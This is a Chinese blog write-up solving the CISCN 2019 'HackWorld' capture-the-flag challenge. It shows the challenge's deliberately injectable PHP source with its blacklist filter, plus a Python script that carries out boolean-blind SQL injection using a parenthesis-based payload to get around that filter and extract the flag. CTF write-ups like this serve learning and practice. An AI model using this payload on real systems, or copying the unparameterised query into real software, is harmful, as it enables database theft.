CISCN2019华北赛区Day2-HackWorld

 · 2020-6-19  ·次阅读


题目地址:buuctf

打开题目

1

结合提示,是个sql注入类型的题目,尝试注入测试

输入单个字母的话提示bool(false),输入1提示Hello, glzjin wants a girlfriend. 输入2提示Do you want to be my girlfriend?其他数字则是Error Occured When Fetch Result.

能猜出来是布尔盲注了,而且这里还有过滤,可以用burpsuit来fuzz一下,这里贴出来源代码吧

<?php
$dbuser='root';
$dbpass='root';

function safe($sql){
    #被过滤的内容 函数基本没过滤
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        if(stripos($sql,$blackitem)){
            return False;
        }
    }
    return True;
}
if(isset($_POST['id'])){
    $id = $_POST['id'];
}else{
    die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
    die(mysql_error());
}   
mysql_select_db("ctf",$db);

if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");

    if($query){
        $result = mysql_fetch_array($query);

        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}

可以看到过滤了空格等很多东西,但是也有很多东西没过滤

因为我能力有限,还是研究师傅们的代码吧

import requests
import base64
import sys
import string
import hashlib
import io
import time

sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')        #改变标准输出的默认编码,否则s.text不能输出
x = string.printable
flag = ""
url = "http://56039d8e-d2a3-4fc1-8195-3e18f2c1ea8c.node3.buuoj.cn/index.php"
payload={
    "id" : ""
}
for i in range(0,60):
    for j in x:
        payload["id"] = "1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)=1"%(str(i),ord(j))
        s = requests.post(url,data=payload)
        #print(s.text)
        if "Hello" in s.text:
            flag += j
            print(flag)
            break

print(flag)

但是这个代码我运行的时候报错,所以删掉了sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')

能够正常运行,得到flag